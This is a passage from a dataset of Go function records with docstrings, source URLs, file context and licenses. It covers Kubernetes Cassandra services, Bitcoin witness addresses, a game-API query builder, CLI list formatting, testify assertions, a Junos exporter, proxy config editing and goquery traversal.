addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.NodePortService)
return service
} | newNodePortServiceForCassandraDatacenter creates a NodePort service owned by the CassandraDatacenter
that preserves client source IPs (ExternalTrafficPolicy: Local). | https://github.com/k8ssandra/cass-operator/blob/9b1d3797278a5cd1653d64611a312427d1b0a482/pkg/reconciliation/construct_service.go#L206-L236 | package reconciliation
import (
"net"
api "github.com/k8ssandra/cass-operator/apis/cassandra/v1beta1"
"github.com/k8ssandra/cass-operator/pkg/oplabels"
"github.com/k8ssandra/cass-operator/pkg/utils"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
)
func newServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
svcName := dc.GetDatacenterServiceName()
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = svcName
nativePort := api.DefaultNativePort
if dc.IsNodePortEnabled() {
nativePort = dc.GetNodePortNativePort()
}
ports := []corev1.ServicePort{
namedServicePort("native", nativePort, nativePort),
namedServicePort("tls-native", 9142, 9142),
namedServicePort("mgmt-api", 8080, 8080),
namedServicePort("prometheus", 9103, 9103),
namedServicePort("thrift", 9160, 9160),
}
if dc.Spec.DseWorkloads != nil {
if dc.Spec.DseWorkloads.AnalyticsEnabled {
ports = append(
ports,
namedServicePort("dsefs-public", 5598, 5598),
namedServicePort("spark-worker", 7081, 7081),
namedServicePort("jobserver", 8090, 8090),
namedServicePort("always-on-sql", 9077, 9077),
namedServicePort("sql-thrift", 10000, 10000),
namedServicePort("spark-history", 18080, 18080),
)
}
if dc.Spec.DseWorkloads.GraphEnabled {
ports = append(
ports,
namedServicePort("gremlin", 8182, 8182),
)
}
if dc.Spec.DseWorkloads.SearchEnabled {
ports = append(
ports,
namedServicePort("solr", 8983, 8983),
)
}
}
service.Spec.Ports = ports
addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.DatacenterService)
utils.AddHashAnnotation(service)
return service
}
func addAdditionalOptions(service *corev1.Service, serviceConfig *api.ServiceConfigAdditions) {
if serviceConfig.Labels != nil && len(serviceConfig.Labels) > 0 {
if service.Labels == nil {
service.Labels = make(map[string]string, len(serviceConfig.Labels))
}
for k, v := range serviceConfig.Labels {
service.Labels[k] = v
}
}
if serviceConfig.Annotations != nil && len(serviceConfig.Annotations) > 0 {
if service.Annotations == nil {
service.Annotations = make(map[string]string, len(serviceConfig.Annotations))
}
for k, v := range serviceConfig.Annotations {
service.Annotations[k] = v
}
}
}
func namedServicePort(name string, port int, targetPort int) corev1.ServicePort {
return corev1.ServicePort{Name: name, Port: int32(port), TargetPort: intstr.FromInt(targetPort)}
}
func buildLabelSelectorForSeedService(dc *api.CassandraDatacenter) map[string]string {
labels := dc.GetClusterLabels()
labels[api.SeedNodeLabel] = "true"
return labels
}
func newSeedServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = dc.GetSeedServiceName()
labels := dc.GetClusterLabels()
oplabels.AddManagedByLabel(labels)
service.ObjectMeta.Labels = labels
service.Spec.Selector = buildLabelSelectorForSeedService(dc)
service.Spec.PublishNotReadyAddresses = true
addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.SeedService)
utils.AddHashAnnotation(service)
return service
}
func newAdditionalSeedServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
labels := dc.GetDatacenterLabels()
oplabels.AddManagedByLabel(labels)
var service corev1.Service
service.ObjectMeta.Name = dc.GetAdditionalSeedsServiceName()
service.ObjectMeta.Namespace = dc.Namespace
service.ObjectMeta.Labels = labels
service.Spec.Type = "ClusterIP"
service.Spec.ClusterIP = "None"
service.Spec.PublishNotReadyAddresses = true
addAdditionalOptions(&service, &dc.Spec.AdditionalServiceConfig.AdditionalSeedService)
utils.AddHashAnnotation(&service)
return &service
}
func newEndpointsForAdditionalSeeds(dc *api.CassandraDatacenter) (*corev1.Endpoints, error) {
labels := dc.GetDatacenterLabels()
oplabels.AddManagedByLabel(labels)
endpoints := corev1.Endpoints{}
endpoints.ObjectMeta.Name = dc.GetAdditionalSeedsServiceName()
endpoints.ObjectMeta.Namespace = dc.Namespace
endpoints.ObjectMeta.Labels = labels
addresses := make([]corev1.EndpointAddress, 0, len(dc.Spec.AdditionalSeeds))
for _, additionalSeed := range dc.Spec.AdditionalSeeds {
if ip := net.ParseIP(additionalSeed); ip != nil {
addresses = append(addresses, corev1.EndpointAddress{
IP: additionalSeed,
})
} else {
additionalSeedIPs, err := resolveAddress(additionalSeed)
if err != nil {
return nil, err
}
for _, address := range additionalSeedIPs {
addresses = append(addresses, corev1.EndpointAddress{
IP: address,
})
}
}
}
endpoints.Subsets = []corev1.EndpointSubset{
{
Addresses: addresses,
},
}
utils.AddHashAnnotation(&endpoints)
return &endpoints, nil
}
func resolveAddress(hostname string) ([]string, error) {
ips, err := net.LookupIP(hostname)
if err != nil {
return []string{}, err
}
ipStrings := make([]string, 0, len(ips))
for _, ip := range ips {
if ip.To4() != nil {
ipStrings = append(ipStrings, ip.String())
}
}
return ipStrings, nil
} | Apache License 2.0 |
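A minimal in-package test sketch for the NodePort builder above. The datacenter fixture is hypothetical (newNodePortEnabledDc is not part of this record) because the fields that enable NodePort networking are not shown here; the assertions only check what the function itself sets.

package reconciliation

import (
	"testing"

	corev1 "k8s.io/api/core/v1"
)

func TestNodePortServiceShape(t *testing.T) {
	// Hypothetical helper returning a *api.CassandraDatacenter with NodePort enabled.
	dc := newNodePortEnabledDc()

	svc := newNodePortServiceForCassandraDatacenter(dc)

	if svc.Spec.Type != corev1.ServiceTypeNodePort {
		t.Fatalf("expected a NodePort service, got %q", svc.Spec.Type)
	}
	if svc.Spec.ExternalTrafficPolicy != corev1.ServiceExternalTrafficPolicyTypeLocal {
		t.Fatalf("expected Local external traffic policy to preserve client source IPs")
	}
	if len(svc.Spec.Ports) != 2 { // internode + native, exactly as built above
		t.Fatalf("expected 2 ports, got %d", len(svc.Spec.Ports))
	}
}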
keyfuse/tokucore | xcore/address_p2wsh_v0.go | Hash160 | go | func (a *PayToWitnessV0ScriptHashAddress) Hash160() []byte {
return a.witnessProgram[:]
} | Hash160 -- the address hash bytes.
Note: for P2WSH v0 this is the 32-byte sha256 witness program, not a hash160 digest. | https://github.com/keyfuse/tokucore/blob/d2b8996b1e5602e00988fa7b5b9c87ab150d4567/xcore/address_p2wsh_v0.go#L51-L53 | package xcore
import (
"github.com/keyfuse/tokucore/network"
"github.com/keyfuse/tokucore/xbase"
)
type PayToWitnessV0ScriptHashAddress struct {
witnessVersion byte
witnessProgram [32]byte
}
func NewPayToWitnessV0ScriptHashAddress(witnessProgram []byte) Address {
if len(witnessProgram) != 32 {
return nil
}
var witness [32]byte
copy(witness[:], witnessProgram)
return &PayToWitnessV0ScriptHashAddress{
witnessVersion: 0x00,
witnessProgram: witness,
}
}
func (a *PayToWitnessV0ScriptHashAddress) ToString(net *network.Network) string {
str, err := xbase.WitnessEncode(net.Bech32HRPSegwit, a.witnessVersion, a.witnessProgram[:])
if err != nil {
return ""
}
return str
} | BSD 3-Clause New or Revised License |
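A sketch of why the docstring stresses sha256: a P2WSH v0 witness program is the sha256 of the redeem script, and the address is built from that 32-byte digest. The redeem script bytes and the "bc" HRP below are illustrative, and the xcore import path is inferred from the repository layout.

package main

import (
	"crypto/sha256"
	"fmt"

	"github.com/keyfuse/tokucore/network"
	"github.com/keyfuse/tokucore/xcore"
)

func main() {
	redeemScript := []byte{0x51} // illustrative script (OP_1); any script works
	program := sha256.Sum256(redeemScript)

	// The constructor expects exactly the 32-byte sha256 digest, not a hash160.
	addr := xcore.NewPayToWitnessV0ScriptHashAddress(program[:])

	net := &network.Network{Bech32HRPSegwit: "bc"} // field name taken from ToString above
	fmt.Println(addr.ToString(net))
}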
fuzzystatic/blizzard | wowsearch/search.go | Tag | go | func Tag(value string) *TagSelector {
return &TagSelector{value: value}
} | Tag is used only for media documents.
Specifies the type of media document (item, spell, creature-display, etc.) to query.
Example: wowsearch.Tag("item") | https://github.com/fuzzystatic/blizzard/blob/3990db51d95255824dd109aac21c7591c7ec5db7/wowsearch/search.go#L139-L141 | package wowsearch
import (
"fmt"
"net/url"
"strings"
)
type Opt interface {
Apply(*[]string)
}
func Field() *FieldSelector {
return &FieldSelector{}
}
type FieldSelector struct {
parts []string
}
func (s *FieldSelector) AND(field, value string) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=%s", url.QueryEscape(field), url.QueryEscape(value)))
return s
}
func (s *FieldSelector) OR(field string, values ...string) *FieldSelector {
for i, val := range values {
values[i] = url.QueryEscape(val)
}
s.parts = append(s.parts, fmt.Sprintf("%s=%s", url.QueryEscape(field), strings.Join(values, "||")))
return s
}
func (s *FieldSelector) NOT(field, value string) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s!=%s", url.QueryEscape(field), url.QueryEscape(value)))
return s
}
func (s *FieldSelector) RANGE(field string, start, stop int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[%d,%d]", url.QueryEscape(field), start, stop))
return s
}
func (s *FieldSelector) MIN(field string, value int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[%d,]", url.QueryEscape(field), value))
return s
}
func (s *FieldSelector) MAX(field string, value int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[,%d]", url.QueryEscape(field), value))
return s
}
func (s *FieldSelector) Apply(v *[]string) {
*v = append(*v, strings.Join(s.parts, "&"))
}
func Page(page int) Opt {
if page < 1 {
page = 1
}
return &PageSelector{page: page}
}
type PageSelector struct {
page int
}
func (s *PageSelector) Apply(v *[]string) {
*v = append(*v, fmt.Sprintf("_page=%d", s.page))
}
func PageSize(size int) *PageSizeSelector {
switch {
case size < 1:
size = 1
case size > 1000:
size = 1000
}
return &PageSizeSelector{size: size}
}
type PageSizeSelector struct {
size int
}
func (s *PageSizeSelector) Apply(v *[]string) {
*v = append(*v, fmt.Sprintf("_pageSize=%d", s.size))
}
func OrderBy(fields ...string) *OrderBySelector {
return &OrderBySelector{fields: fields}
}
type OrderBySelector struct {
fields []string
}
func (s *OrderBySelector) Apply(v *[]string) {
for i, val := range s.fields {
s.fields[i] = url.QueryEscape(val)
}
*v = append(*v, fmt.Sprintf("orderby=%s", strings.Join(s.fields, ",")))
} | MIT License |
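A composition sketch for the Opt selectors defined above: each Apply appends an encoded fragment to a shared slice, which the blizzard client can join into a query string. The field names, values, and the final join are illustrative; the import path is inferred from the repository layout, and Tag is assumed to satisfy Opt like the other selectors.

package main

import (
	"fmt"
	"strings"

	"github.com/fuzzystatic/blizzard/wowsearch"
)

func main() {
	opts := []wowsearch.Opt{
		wowsearch.Page(1),
		wowsearch.PageSize(100),
		wowsearch.OrderBy("id"),
		wowsearch.Tag("item"), // assumed to implement Opt like the other selectors
		wowsearch.Field().
			AND("rarity.type", "EPIC").
			RANGE("level", 40, 50),
	}

	var parts []string
	for _, o := range opts {
		o.Apply(&parts) // every selector contributes its encoded fragment
	}
	fmt.Println(strings.Join(parts, "&"))
}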
gookit/gcli | show/list.go | String | go | func (ls *Lists) String() string {
return ls.Format()
} | String returns the formatted string. | https://github.com/gookit/gcli/blob/37bbd035319b4d39a30db462bab462a3a6d40477/show/list.go#L217-L219 | package show
import (
"bytes"
"os"
"github.com/gookit/color"
"github.com/gookit/goutil/strutil"
)
type ListOption struct {
IgnoreEmpty bool
UpperFirst bool
SepChar string
LeftIndent string
KeyWidth int
KeyMinWidth int
KeyStyle string
ValueStyle string
TitleStyle string
}
type List struct {
Base
Opts *ListOption
title string
data interface{}
buffer *bytes.Buffer
}
func (l *List) SetBuffer(buffer *bytes.Buffer) {
l.buffer = buffer
}
func NewList(title string, data interface{}) *List {
return &List{
title: title,
data: data,
Base: Base{output: os.Stdout},
Opts: &ListOption{
SepChar: " ",
KeyStyle: "info",
LeftIndent: " ",
KeyMinWidth: 8,
IgnoreEmpty: true,
TitleStyle: "comment",
},
}
}
func (l *List) WithOptions(fn func(opts *ListOption)) *List {
if fn != nil {
fn(l.Opts)
}
return l
}
func (l *List) Format() string {
if l.data == nil || l.formatted != "" {
return l.formatted
}
if l.buffer == nil {
l.buffer = new(bytes.Buffer)
}
if l.title != "" {
title := strutil.UpperWord(l.title)
l.buffer.WriteString(color.WrapTag(title, l.Opts.TitleStyle) + "\n")
}
items := NewItems(l.data)
keyWidth := items.KeyMaxWidth(l.Opts.KeyWidth)
if keyWidth < l.Opts.KeyMinWidth {
keyWidth = l.Opts.KeyMinWidth
}
for _, item := range items.List {
if l.Opts.IgnoreEmpty && item.Val == "" {
continue
}
if l.Opts.LeftIndent != "" {
l.buffer.WriteString(l.Opts.LeftIndent)
}
if items.itemType == ItemMap {
key := strutil.PadRight(item.Key, " ", keyWidth)
key = color.WrapTag(key, l.Opts.KeyStyle)
l.buffer.WriteString(key + l.Opts.SepChar)
}
val := item.Val
if l.Opts.UpperFirst {
val = strutil.UpperFirst(val)
}
l.buffer.WriteString(val + "\n")
}
l.formatted = l.buffer.String()
return l.formatted
}
func (l *List) String() string {
return l.Format()
}
func (l *List) Print() {
l.Format()
l.Base.Print()
}
func (l *List) Println() {
l.Format()
l.Base.Println()
}
func (l *List) Flush() {
l.Println()
l.buffer.Reset()
l.formatted = ""
}
type Lists struct {
Base
Opts *ListOption
rows []*List
buffer *bytes.Buffer
}
func NewLists(listMap map[string]interface{}) *Lists {
ls := &Lists{
Opts: &ListOption{
SepChar: " ",
KeyStyle: "info",
LeftIndent: " ",
KeyMinWidth: 8,
IgnoreEmpty: true,
TitleStyle: "comment",
},
}
for title, data := range listMap {
ls.rows = append(ls.rows, NewList(title, data))
}
return ls
}
func (ls *Lists) WithOptions(fn func(opts *ListOption)) *Lists {
if fn != nil {
fn(ls.Opts)
}
return ls
}
func (ls *Lists) Format() string {
if len(ls.rows) == 0 || ls.formatted != "" {
return ls.formatted
}
ls.buffer = new(bytes.Buffer)
for _, list := range ls.rows {
list.Opts = ls.Opts
list.SetBuffer(ls.buffer)
list.Format()
}
ls.formatted = ls.buffer.String()
return ls.formatted
} | MIT License |
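A usage sketch for Lists.String above: NewLists takes a map of titled blocks and String renders them with the shared ListOption. The sample data is illustrative and the import path (without a module version suffix) is inferred from the repository layout.

package main

import (
	"fmt"

	"github.com/gookit/gcli/show"
)

func main() {
	data := map[string]interface{}{
		"app":     map[string]string{"name": "demo", "version": "1.0.0"},
		"authors": []string{"alice", "bob"},
	}

	ls := show.NewLists(data).WithOptions(func(opts *show.ListOption) {
		opts.SepChar = " : " // tweak rendering before the lazy formatting runs
	})
	fmt.Print(ls.String()) // String formats once and caches the result
}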
celrenheit/alfred | vendor/github.com/stretchr/testify/require/require_forward.go | EqualValuesf | go | func (a *Assertions) EqualValuesf(expected interface{}, actual interface{}, msg string, args ...interface{}) {
EqualValuesf(a.t, expected, actual, msg, args...)
} | EqualValuesf asserts that two objects are equal or convertible to the same types
and equal.
a.EqualValuesf(uint32(123), int32(123), "error message %s", "formatted") | https://github.com/celrenheit/alfred/blob/c19fe4f23ae43517f2ec11cf7f33b91c73a852d6/vendor/github.com/stretchr/testify/require/require_forward.go#L130-L132 | package require
import (
assert "github.com/stretchr/testify/assert"
http "net/http"
url "net/url"
time "time"
)
func (a *Assertions) Condition(comp assert.Comparison, msgAndArgs ...interface{}) {
Condition(a.t, comp, msgAndArgs...)
}
func (a *Assertions) Conditionf(comp assert.Comparison, msg string, args ...interface{}) {
Conditionf(a.t, comp, msg, args...)
}
func (a *Assertions) Contains(s interface{}, contains interface{}, msgAndArgs ...interface{}) {
Contains(a.t, s, contains, msgAndArgs...)
}
func (a *Assertions) Containsf(s interface{}, contains interface{}, msg string, args ...interface{}) {
Containsf(a.t, s, contains, msg, args...)
}
func (a *Assertions) DirExists(path string, msgAndArgs ...interface{}) {
DirExists(a.t, path, msgAndArgs...)
}
func (a *Assertions) DirExistsf(path string, msg string, args ...interface{}) {
DirExistsf(a.t, path, msg, args...)
}
func (a *Assertions) ElementsMatch(listA interface{}, listB interface{}, msgAndArgs ...interface{}) {
ElementsMatch(a.t, listA, listB, msgAndArgs...)
}
func (a *Assertions) ElementsMatchf(listA interface{}, listB interface{}, msg string, args ...interface{}) {
ElementsMatchf(a.t, listA, listB, msg, args...)
}
func (a *Assertions) Empty(object interface{}, msgAndArgs ...interface{}) {
Empty(a.t, object, msgAndArgs...)
}
func (a *Assertions) Emptyf(object interface{}, msg string, args ...interface{}) {
Emptyf(a.t, object, msg, args...)
}
func (a *Assertions) Equal(expected interface{}, actual interface{}, msgAndArgs ...interface{}) {
Equal(a.t, expected, actual, msgAndArgs...)
}
func (a *Assertions) EqualError(theError error, errString string, msgAndArgs ...interface{}) {
EqualError(a.t, theError, errString, msgAndArgs...)
}
func (a *Assertions) EqualErrorf(theError error, errString string, msg string, args ...interface{}) {
EqualErrorf(a.t, theError, errString, msg, args...)
}
func (a *Assertions) EqualValues(expected interface{}, actual interface{}, msgAndArgs ...interface{}) {
EqualValues(a.t, expected, actual, msgAndArgs...)
} | Apache License 2.0 |
czerwonk/junos_exporter | interfacediagnostics/collector.go | Name | go | func (*interfaceDiagnosticsCollector) Name() string {
return "Interface Diagnostics"
} | Name returns the name of the collector | https://github.com/czerwonk/junos_exporter/blob/9808212c8ee15827e6e3c762c2335ed679de1492/interfacediagnostics/collector.go#L78-L80 | package interfacediagnostics
import (
"encoding/xml"
"log"
"math"
"strconv"
"strings"
"github.com/czerwonk/junos_exporter/interfacelabels"
"github.com/czerwonk/junos_exporter/rpc"
"github.com/czerwonk/junos_exporter/collector"
"github.com/prometheus/client_golang/prometheus"
)
const prefix = "junos_interface_diagnostics_"
type interfaceDiagnosticsCollector struct {
labels *interfacelabels.DynamicLabels
laserBiasCurrentDesc *prometheus.Desc
laserBiasCurrentHighAlarmThresholdDesc *prometheus.Desc
laserBiasCurrentLowAlarmThresholdDesc *prometheus.Desc
laserBiasCurrentHighWarnThresholdDesc *prometheus.Desc
laserBiasCurrentLowWarnThresholdDesc *prometheus.Desc
laserOutputPowerDesc *prometheus.Desc
laserOutputPowerHighAlarmThresholdDesc *prometheus.Desc
laserOutputPowerLowAlarmThresholdDesc *prometheus.Desc
laserOutputPowerHighWarnThresholdDesc *prometheus.Desc
laserOutputPowerLowWarnThresholdDesc *prometheus.Desc
laserOutputPowerDbmDesc *prometheus.Desc
laserOutputPowerHighAlarmThresholdDbmDesc *prometheus.Desc
laserOutputPowerLowAlarmThresholdDbmDesc *prometheus.Desc
laserOutputPowerHighWarnThresholdDbmDesc *prometheus.Desc
laserOutputPowerLowWarnThresholdDbmDesc *prometheus.Desc
moduleTemperatureDesc *prometheus.Desc
moduleTemperatureHighAlarmThresholdDesc *prometheus.Desc
moduleTemperatureLowAlarmThresholdDesc *prometheus.Desc
moduleTemperatureHighWarnThresholdDesc *prometheus.Desc
moduleTemperatureLowWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerDesc *prometheus.Desc
laserRxOpticalPowerHighAlarmThresholdDesc *prometheus.Desc
laserRxOpticalPowerLowAlarmThresholdDesc *prometheus.Desc
laserRxOpticalPowerHighWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerLowWarnThresholdDesc *prometheus.Desc
laserRxOpticalPowerDbmDesc *prometheus.Desc
laserRxOpticalPowerHighAlarmThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerLowAlarmThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerHighWarnThresholdDbmDesc *prometheus.Desc
laserRxOpticalPowerLowWarnThresholdDbmDesc *prometheus.Desc
moduleVoltageDesc *prometheus.Desc
moduleVoltageHighAlarmThresholdDesc *prometheus.Desc
moduleVoltageLowAlarmThresholdDesc *prometheus.Desc
moduleVoltageHighWarnThresholdDesc *prometheus.Desc
moduleVoltageLowWarnThresholdDesc *prometheus.Desc
rxSignalAvgOpticalPowerDesc *prometheus.Desc
rxSignalAvgOpticalPowerDbmDesc *prometheus.Desc
}
func NewCollector(labels *interfacelabels.DynamicLabels) collector.RPCCollector {
c := &interfaceDiagnosticsCollector{
labels: labels,
}
c.init()
return c
} | MIT License |
adzimzf/tpot | config/config.go | EditPlain | go | func (c *Config) EditPlain(envName, configPlain string) (string, error) {
result, err := editor.Edit(configPlain, "edit_proxy*.yaml")
if err != nil {
return "", err
}
var tmpConfig Config
if err := yaml.Unmarshal([]byte(result), &tmpConfig); err != nil {
return result, err
}
if l := len(tmpConfig.Proxies); l != 1 {
return result, fmt.Errorf("need one proxy confugration, find %d", l)
}
newProxy, err := tmpConfig.FindProxy(envName)
if err != nil {
newProxy = tmpConfig.Proxies[0]
}
if err := newProxy.Validate(); err != nil {
return result, fmt.Errorf("failed to validate %v", err)
}
for i, proxy := range c.Proxies {
if proxy.Env == envName {
c.Proxies[i] = newProxy
}
}
return result, c.save()
} | EditPlain edits a specific proxy configuration from the given plain-text config | https://github.com/adzimzf/tpot/blob/f0483be3116ef0948c5420880a9af3ac085729a7/config/config.go#L159-L189 | package config
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/adzimzf/tpot/editor"
"github.com/manifoldco/promptui"
"gopkg.in/yaml.v2"
)
var (
Dir = os.Getenv("HOME") + "/.tpot/"
ErrValidateConfig = errors.New("config is invalid")
)
const configFileName = "config.yaml"
type Config struct {
Editor string `json:"editor" yaml:"editor"`
Proxies []*Proxy `json:"proxies" yaml:"proxies"`
}
func NewConfig() (*Config, error) {
if err := addConfigDirExist(); err != nil {
return nil, err
}
config, err := getConfig()
if errors.Is(err, os.ErrNotExist) {
config = &Config{
Editor: editor.DefaultEditor,
}
if err := config.save(); err != nil {
return nil, err
}
} else if err != nil {
return nil, err
}
return config, nil
}
func getConfig() (*Config, error) {
bytes, err := ioutil.ReadFile(Dir + configFileName)
if errors.Is(err, os.ErrNotExist) {
bytes, err := ioutil.ReadFile(Dir + "config.json")
if err != nil {
return nil, err
}
var config Config
err = json.Unmarshal(bytes, &config)
if err != nil {
return nil, err
}
if err = config.save(); err != nil {
return nil, err
}
return &config, nil
}
if err != nil {
return nil, err
}
var config Config
err = yaml.Unmarshal(bytes, &config)
if err != nil {
return nil, err
}
return &config, nil
}
func (c *Config) Add() (string, error) {
return c.AddPlain(proxyTemplate)
}
func (c *Config) AddPlain(configPlain string) (string, error) {
result, err := editor.Edit(configPlain, "add_proxy*.yaml")
if err != nil {
return "", err
}
if result == proxyTemplate {
return "", fmt.Errorf("there's no proxy was added")
}
var tmpConfig Config
if err := yaml.Unmarshal([]byte(result), &tmpConfig); err != nil {
return result, err
}
if l := len(tmpConfig.Proxies); l != 1 {
return result, fmt.Errorf("need one proxy confugration, find %d", l)
}
if err := tmpConfig.Proxies[0].Validate(); err != nil {
return result, fmt.Errorf("failed to validate %v", err)
}
_, err = c.FindProxy(tmpConfig.Proxies[0].Env)
if err != ErrEnvNotFound {
return result, fmt.Errorf("environment %s is already exist", tmpConfig.Proxies[0].Env)
}
c.Proxies = append(c.Proxies, tmpConfig.Proxies[0])
return result, c.save()
}
func (c *Config) save() error {
bytes, err := yaml.Marshal(&c)
if err != nil {
return err
}
return ioutil.WriteFile(Dir+configFileName, bytes, permission)
}
func (c *Config) Edit(envName string) (string, error) {
proxy, err := c.FindProxy(envName)
if err != nil {
return "", fmt.Errorf("proxy %s is not found", envName)
}
tmpConfig := Config{
Proxies: []*Proxy{
proxy,
},
}
marshal, err := yaml.Marshal(tmpConfig)
if err != nil {
return "", fmt.Errorf("proxy confugration is invalid")
}
return c.EditPlain(envName, string(marshal))
} | MIT License |
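A short driver sketch for the editing flow above, using only constructors and methods shown in this file; the environment name is illustrative and the import path follows the function URL.

package main

import (
	"fmt"
	"os"

	"github.com/adzimzf/tpot/config"
)

func main() {
	cfg, err := config.NewConfig() // loads (or creates) ~/.tpot/config.yaml
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}

	// Edit opens the "staging" proxy in the configured editor; the edited
	// YAML is then validated and saved via EditPlain.
	if _, err := cfg.Edit("staging"); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}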
tejo/boxed | vendor/github.com/PuerkitoBio/goquery/traversal.go | PrevAllMatcher | go | func (s *Selection) PrevAllMatcher(m Matcher) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingPrevAll, nil, nil), m)
} | PrevAllMatcher gets all the preceding siblings of each element in the
Selection filtered by a matcher. It returns a new Selection object
containing the matched elements. | https://github.com/tejo/boxed/blob/35c0b0e250ab3a71a7507efd9685aad3523d3fea/vendor/github.com/PuerkitoBio/goquery/traversal.go#L360-L362 | package goquery
import (
"github.com/andybalholm/cascadia"
"golang.org/x/net/html"
)
type siblingType int
const (
siblingPrevUntil siblingType = iota - 3
siblingPrevAll
siblingPrev
siblingAll
siblingNext
siblingNextAll
siblingNextUntil
siblingAllIncludingNonElements
)
func (s *Selection) Find(selector string) *Selection {
return pushStack(s, findWithMatcher(s.Nodes, cascadia.MustCompile(selector)))
}
func (s *Selection) FindMatcher(m Matcher) *Selection {
return pushStack(s, findWithMatcher(s.Nodes, m))
}
func (s *Selection) FindSelection(sel *Selection) *Selection {
if sel == nil {
return pushStack(s, nil)
}
return s.FindNodes(sel.Nodes...)
}
func (s *Selection) FindNodes(nodes ...*html.Node) *Selection {
return pushStack(s, mapNodes(nodes, func(i int, n *html.Node) []*html.Node {
if sliceContains(s.Nodes, n) {
return []*html.Node{n}
}
return nil
}))
}
func (s *Selection) Contents() *Selection {
return pushStack(s, getChildrenNodes(s.Nodes, siblingAllIncludingNonElements))
}
func (s *Selection) ContentsFiltered(selector string) *Selection {
if selector != "" {
return s.ChildrenFiltered(selector)
}
return s.Contents()
}
func (s *Selection) ContentsMatcher(m Matcher) *Selection {
return s.ChildrenMatcher(m)
}
func (s *Selection) Children() *Selection {
return pushStack(s, getChildrenNodes(s.Nodes, siblingAll))
}
func (s *Selection) ChildrenFiltered(selector string) *Selection {
return filterAndPush(s, getChildrenNodes(s.Nodes, siblingAll), cascadia.MustCompile(selector))
}
func (s *Selection) ChildrenMatcher(m Matcher) *Selection {
return filterAndPush(s, getChildrenNodes(s.Nodes, siblingAll), m)
}
func (s *Selection) Parent() *Selection {
return pushStack(s, getParentNodes(s.Nodes))
}
func (s *Selection) ParentFiltered(selector string) *Selection {
return filterAndPush(s, getParentNodes(s.Nodes), cascadia.MustCompile(selector))
}
func (s *Selection) ParentMatcher(m Matcher) *Selection {
return filterAndPush(s, getParentNodes(s.Nodes), m)
}
func (s *Selection) Closest(selector string) *Selection {
cs := cascadia.MustCompile(selector)
return s.ClosestMatcher(cs)
}
func (s *Selection) ClosestMatcher(m Matcher) *Selection {
return pushStack(s, mapNodes(s.Nodes, func(i int, n *html.Node) []*html.Node {
for ; n != nil; n = n.Parent {
if m.Match(n) {
return []*html.Node{n}
}
}
return nil
}))
}
func (s *Selection) ClosestNodes(nodes ...*html.Node) *Selection {
return pushStack(s, mapNodes(s.Nodes, func(i int, n *html.Node) []*html.Node {
for ; n != nil; n = n.Parent {
if isInSlice(nodes, n) {
return []*html.Node{n}
}
}
return nil
}))
}
func (s *Selection) ClosestSelection(sel *Selection) *Selection {
if sel == nil {
return pushStack(s, nil)
}
return s.ClosestNodes(sel.Nodes...)
}
func (s *Selection) Parents() *Selection {
return pushStack(s, getParentsNodes(s.Nodes, nil, nil))
}
func (s *Selection) ParentsFiltered(selector string) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) ParentsMatcher(m Matcher) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nil), m)
}
func (s *Selection) ParentsUntil(selector string) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, cascadia.MustCompile(selector), nil))
}
func (s *Selection) ParentsUntilMatcher(m Matcher) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, m, nil))
}
func (s *Selection) ParentsUntilSelection(sel *Selection) *Selection {
if sel == nil {
return s.Parents()
}
return s.ParentsUntilNodes(sel.Nodes...)
}
func (s *Selection) ParentsUntilNodes(nodes ...*html.Node) *Selection {
return pushStack(s, getParentsNodes(s.Nodes, nil, nodes))
}
func (s *Selection) ParentsFilteredUntil(filterSelector, untilSelector string) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, cascadia.MustCompile(untilSelector), nil), cascadia.MustCompile(filterSelector))
}
func (s *Selection) ParentsFilteredUntilMatcher(filter, until Matcher) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, until, nil), filter)
}
func (s *Selection) ParentsFilteredUntilSelection(filterSelector string, sel *Selection) *Selection {
return s.ParentsMatcherUntilSelection(cascadia.MustCompile(filterSelector), sel)
}
func (s *Selection) ParentsMatcherUntilSelection(filter Matcher, sel *Selection) *Selection {
if sel == nil {
return s.ParentsMatcher(filter)
}
return s.ParentsMatcherUntilNodes(filter, sel.Nodes...)
}
func (s *Selection) ParentsFilteredUntilNodes(filterSelector string, nodes ...*html.Node) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nodes), cascadia.MustCompile(filterSelector))
}
func (s *Selection) ParentsMatcherUntilNodes(filter Matcher, nodes ...*html.Node) *Selection {
return filterAndPush(s, getParentsNodes(s.Nodes, nil, nodes), filter)
}
func (s *Selection) Siblings() *Selection {
return pushStack(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil))
}
func (s *Selection) SiblingsFiltered(selector string) *Selection {
return filterAndPush(s, getSiblingNodes(s.Nodes, siblingAll, nil, nil), cascadia.MustCompile(selector))
}
func (s *Selection) SiblingsMatcher(m Matcher) *Selection {
